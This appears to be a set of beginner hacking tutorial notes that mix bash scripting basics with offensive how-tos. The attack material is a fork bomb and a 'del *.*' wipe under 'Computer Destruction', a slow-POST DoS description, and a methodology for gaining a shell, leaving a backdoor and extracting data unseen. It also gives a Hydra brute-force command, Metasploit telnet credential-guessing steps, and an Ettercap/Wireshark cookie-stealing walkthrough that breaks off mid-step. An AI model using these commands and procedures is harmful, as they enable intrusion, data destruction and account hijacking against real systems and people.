Ksh: Korn shell; supports programming features such as floating-point arithmetic
Bash: Bourne-again shell, the text-based shell that is the default on most Linux systems
Zsh: Z shell; considered the most feature-rich shell, with enhanced command completion
and the ability to load modules that add features such as networking and programming
support
Identifying Shell
Type in:
ps -p $$
And the output will look like:
PID TTY TIME CMD
7410 pts/1 00:00:00 bash
PID: the process ID of the current shell ($$ expands to it); the CMD column shows which shell is running (here bash)
Hello World
Open up a new file in kate (or any text editor, e.g. gedit on Ubuntu) and write the following:
#!/bin/bash
echo "helloworld"
To save the file, choose where you want to save it. For the purposes of this tutorial, save it as "helloworld"
Before using it we need to make it executable; to do this type into bash:
chmod u+x helloworld
while you are in the directory with the file. To run the program type ./helloworld into bash. The
./ prefix tells the shell to run the file from the current directory rather than searching the
directories listed in PATH.
#! is known as the shebang and indicates the interpreter for the script
Local variables: only exist in the current shell and go away once we exit the shell
Functions: take code which may be repeated and let us call it as often as we like
Arguments
They allow users to pass values into their scripts. For instance, take the script:
#!/bin/bash
MESSAGE="Wake up, $1"
echo "$MESSAGE"
saved as a program called wake. When it is executed with the command
./wake friend
the output would be:
Wake up, friend
$1 is where the script picks up the first argument; arguments are typed after the script name on the
command line. (Note there must be no spaces around the = in an assignment.)
Argument    Behaviour
$0          Name of script
$1          1st argument
$2          2nd argument
$9          9th argument
$#          Number of arguments we have
If statements
Conditional statements change how a script acts depending on the input. For example:
#!/bin/bash
if [ "$1" = "Neo" ]; then
    MESSAGE="Wake up, $1"
else
    MESSAGE="Hey, you're not Neo"
fi
echo "$MESSAGE"
The spaces inside the [ ] brackets and around the = in the test are required; the keyword is lowercase if.
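The argument table and the if statement above combined into one script, as an added example (not code from the original notes): it wraps the test in a function, uses $# to insist on exactly one argument, and prints a usage line built from $0 when that check fails. The function names greet and check_args are assumptions made for this example.

```shell
#!/bin/bash
# Added example, not from the original notes. Function names are assumptions.

# greet: build the wake-up message for the name passed as its first argument.
# Only Neo gets "Wake up"; anybody else gets a refusal.
greet() {
    if [ "$1" = "Neo" ]; then
        printf 'Wake up, %s\n' "$1"
    else
        printf "Hey, you're not Neo\n"
    fi
}

# check_args: require exactly one argument. Inside a function $# is the
# number of arguments the function itself received, so pass "$@" through.
# $0 is still the script name. Returns 1 (instead of exiting) on bad input
# so the caller decides what to do.
check_args() {
    if [ "$#" -ne 1 ]; then
        printf 'usage: %s NAME\n' "$0" >&2
        return 1
    fi
    return 0
}

# Demonstration when run directly, e.g.  ./wake Neo  or  ./wake Trinity
if check_args "$@"; then
    greet "$1"
fi
```

Running it with no argument or with two prints the usage line on stderr and nothing on stdout; `./wake Neo` prints `Wake up, Neo`.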
Wget
If wget is not already installed on Kali Linux, install it with:
sudo apt-get install wget
Wget downloads the targeted file from the internet. The syntax is:
wget [options] [URL]
Computer Destruction
Fork Bombs
A fork bomb is a program that keeps launching copies of itself until the process table and memory
are exhausted, which makes the system freeze or crash. A simple Windows batch fork bomb is:
%0|%0
The same effect written out longhand:
:s
start %0
goto s
The first line sets a label (a checkpoint) at the beginning of the program. %0 expands to the name of
the .bat file, so start %0 launches a new copy of the script, and goto s sends the program back to the
label to do it again. You can add @echo off at the top to stop the commands being echoed to the user.
Memory wipe
This deletes every file in the current directory; run from a directory the system depends on, it
removes files the OS needs and the system stops working.
del *.*
The * before the '.' means the program deletes files no matter their name; the * after the '.'
means it deletes them no matter their extension.
Concepts
Rudy (R U Dead Yet?)
This attack tool generates traffic at a low rate and volume to slip past anti-DoS tools. It finds a
form that accepts a POST request, declares a large Content-Length, and then, rather than sending the
body in a single packet, sends it one byte at a time with long pauses in between. Each such request
holds a server connection open; after a few thousand of them the server's connection pool is
exhausted and it stops serving legitimate users altogether.
GNOME
GNU Network Object Model Environment
It is comprised mostly of free and open-source tools. It also uses fewer resources than KDE (K
Desktop Environment), although KDE offers more customization.
Rootkits
A rootkit is a set of programs that gives an attacker persistent privileged (root/admin) access to a
machine while hiding its own presence from the user and from security tools
Bootkit: a rootkit that infects the start-up (boot) code so that it loads before the operating system
Payload: the part of a piece of malware that carries out the malicious activity, for instance data
destruction, offensive messages, etc.
IRC (Internet Relay Chat)
It is a pure text chat service. One of the more useful channels is the Computer Hope chat room,
where users ask questions live.
Sample commands:
Command                 Use
/away                   Informs everyone you are AFK
/dcc chat [username]    Opens a direct (client-to-client) chat with a user
/ignore [on/off]        Turns ignoring of a user's messages on or off
/nick [username]        Changes your nickname
/help                   Lists the available commands
Hacking Methodology
This is a simple guide to the phases of a hack.
Reconnaissance
Do this before the hack and find out about:
Computers
Servers
Printers
OS
Wireless networks
IT admins
Etc.
Passive: information gathered without touching the target (basically, do not send any packets to the
target)
Active: information gathered by interacting with the target, i.e. sending packets to it (for example
port scanning)
Gain Access
After recon, work out which vulnerabilities exist on the network and exploit one of them.
The goal is to get shell access on a system so you can execute commands
Escalate privileges
Get to root level on the system. Things you can use are:
Metasploit
Exploits
Social engineering
Leave a backdoor
In case you need to access the system again, you need to leave a way in without having to exploit
the system every time. Sample tools you can use are:
Netcat
Meterpreter (Metasploit)
VNC
Data extraction
Acquire the desired data. Note that admins can see which files you have accessed, so you could try
using a tool like Cryptocat.
Host details: select a host and you can obtain details about it
Scans: a log of all the previous scans you have run
Command: how the current scan would look as an Nmap command line
Topology: a map of the scanned network with all the hosts connected to it
Sample use
Step 1
Type in the target field:
192.168.1.*
(sample IP range) to scan the network, and use the regular scan type to save time.
Step 2
You also need to check the gateway so you do not mix it up with a host; find it by typing
route -n
in bash
Step 3
Do the same as step 1 but with the intense scan profile against your target host to identify its OS
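The same three steps done from the command line instead of the GUI, as an added example that is not part of the original notes: the `route -n` listing below is constructed, not captured from a real host, and the function names are assumptions. It pulls the default gateway out of the routing table and builds the Nmap command lines with that address excluded, so the gateway is not mistaken for a host. `-sn` is Nmap's host-discovery (ping) sweep, `--exclude` drops an address from the target list, and `-T4 -A -v` is what the GUI's "Intense scan" profile runs.

```shell
#!/bin/bash
# Added example, not from the original notes. SAMPLE_ROUTE is a constructed
# `route -n` listing; on a real host replace it with the live command, e.g.
#   GW=$(route -n | default_gateway)
# Function names are assumptions.

SAMPLE_ROUTE='Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
0.0.0.0         192.168.1.1     0.0.0.0         UG    100    0        0 eth0
192.168.1.0     0.0.0.0         255.255.255.0   U     100    0        0 eth0'

# default_gateway: read `route -n` output on stdin and print the gateway of
# the default route (destination 0.0.0.0 with the G flag set).
default_gateway() {
    awk '$1 == "0.0.0.0" && $4 ~ /G/ { print $2; exit }'
}

# discovery_cmd: step 1, a quick host-discovery sweep of a range, with the
# gateway excluded so it is not listed among the hosts.
#   $1 = target range (e.g. 192.168.1.0/24), $2 = gateway address
discovery_cmd() {
    printf 'nmap -sn --exclude %s %s\n' "$2" "$1"
}

# intense_cmd: step 3, the "Intense scan" profile against a single host.
#   $1 = target host
intense_cmd() {
    printf 'nmap -T4 -A -v %s\n' "$1"
}

GW=$(printf '%s\n' "$SAMPLE_ROUTE" | default_gateway)
echo "gateway: $GW"
discovery_cmd 192.168.1.0/24 "$GW"
intense_cmd 192.168.1.10
```

The functions only print the command lines; pipe them to `sh` (or paste them) to run the scans. On the command line the GUI-style target `192.168.1.*` has to be quoted, otherwise the shell tries to expand the * as a filename glob; `192.168.1.0/24` says the same thing without that trap.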
Hydra
Fun idea: maybe try brute-forcing FTP or SSH services instead of the old-fashioned HTTP services.
GUI version: hydra-gtk
Sample command
hydra -l user -P passlist.txt ftp://192.168.0.1
hydra: the program to run (typed into a normal bash shell)
-l means login: with a lowercase l, the next argument (user) is taken as the username. With an
uppercase -L, Hydra instead expects the path to a wordlist and tries every username in it (a
dictionary attack on the username). The same rule applies to passwords: uppercase -P takes a
password wordlist (passlist.txt here), lowercase -p a single password.
Step 2
Scan the target with:
nmap 192.168.227.130
(only if the above IP address is your target). The telnet port (23) needs to be open.
Step 3
Open the Metasploit console using:
msfconsole
Step 4
Then look for telnet modules using:
search telnet
Step 5
Then type:
use auxiliary/scanner/telnet/telnet_login
Step 6
Then look at the options:
show options
Step 7
Then apply the following settings
set USER_AS_PASS true
set BLANK_PASSWORDS true
set RHOSTS 192.168.227.130
set USERPASS_FILE /root/desktop/test.txt
Note that this module is a login scanner, not an exploit: it simply tries credentials against the
telnet service, so you need a dictionary file in USERPASS_FILE for it to do anything. The file holds
one "username password" pair per line, separated by a space.
Step 8
Install putty using:
apt-get install putty
Then use putty to connect to the target over telnet with the credentials the scanner found
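USERPASS_FILE expects one `user password` pair per line, which is a different layout from the one-entry-per-line wordlists Hydra's -P takes, so a plain password list will not work there. The script below is an added example, not part of the notes or of Metasploit: it builds a file in that layout from a user list and a password list (both constructed here), drops duplicate pairs, and reports how many logins the scanner will attempt. The names users.txt, passes.txt, make_userpass and count_pairs are assumptions. Once the file is set, `run` in msfconsole starts the scan.

```shell
#!/bin/bash
# Added example, not from the original notes or from Metasploit. The user
# and password lists are constructed; file and function names are assumptions.

# make_userpass: print every "user password" combination of two wordlists,
# one pair per line, the layout telnet_login's USERPASS_FILE expects.
#   $1 = users file (one username per line), $2 = passwords file
make_userpass() {
    while IFS= read -r user; do
        [ -n "$user" ] || continue             # skip blank lines
        while IFS= read -r pass; do
            [ -n "$pass" ] || continue
            printf '%s %s\n' "$user" "$pass"
        done < "$2"
    done < "$1" | sort -u                     # drop duplicate pairs
}

# count_pairs: number of non-empty lines, i.e. candidate logins, in a file.
count_pairs() {
    grep -c . "$1"
}

# Build the constructed input lists in a scratch directory and generate the
# dictionary file; the path printed is what goes into `set USERPASS_FILE`.
WORK=$(mktemp -d)
printf 'root\nadmin\nmsfadmin\n' > "$WORK/users.txt"
printf 'toor\nadmin\nmsfadmin\npassword\n' > "$WORK/passes.txt"
make_userpass "$WORK/users.txt" "$WORK/passes.txt" > "$WORK/test.txt"
echo "wrote $(count_pairs "$WORK/test.txt") pairs to $WORK/test.txt"
```

With USER_AS_PASS and BLANK_PASSWORDS also set, the module adds a "same as username" and an empty-password attempt for every user in the file on top of these pairs, so there is no need to put those rows in the file yourself.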
Cookie stealing
Step 1
Open a terminal then start Ettercap's GUI using:
ettercap -G
Step 2
Go to
Sniff > Unified sniffing
and select the primary network interface of your computer (eth0 or wlan0)
Step 3
Go to
Hosts > Hosts list
Step 4
Then go to
Hosts > Scan for hosts
Step 5
Go to
Start > Start sniffing
Step 6
Open Wireshark,
then select the network interface and start a capture
Step 7
Set your Wireshark display filter to
http.cookie
because we are looking for cookies. Note this only matches plain HTTP; cookies sent over HTTPS are
encrypted and will not show up. Then wait a bit for the target to generate a cookie.
Step 8
When a cookie packet appears, right-click it and select:
Copy > Bytes > Printable Text Only
This just copies the cookie onto our clipboard.
Step 9
Go to the target website then set the cookie to: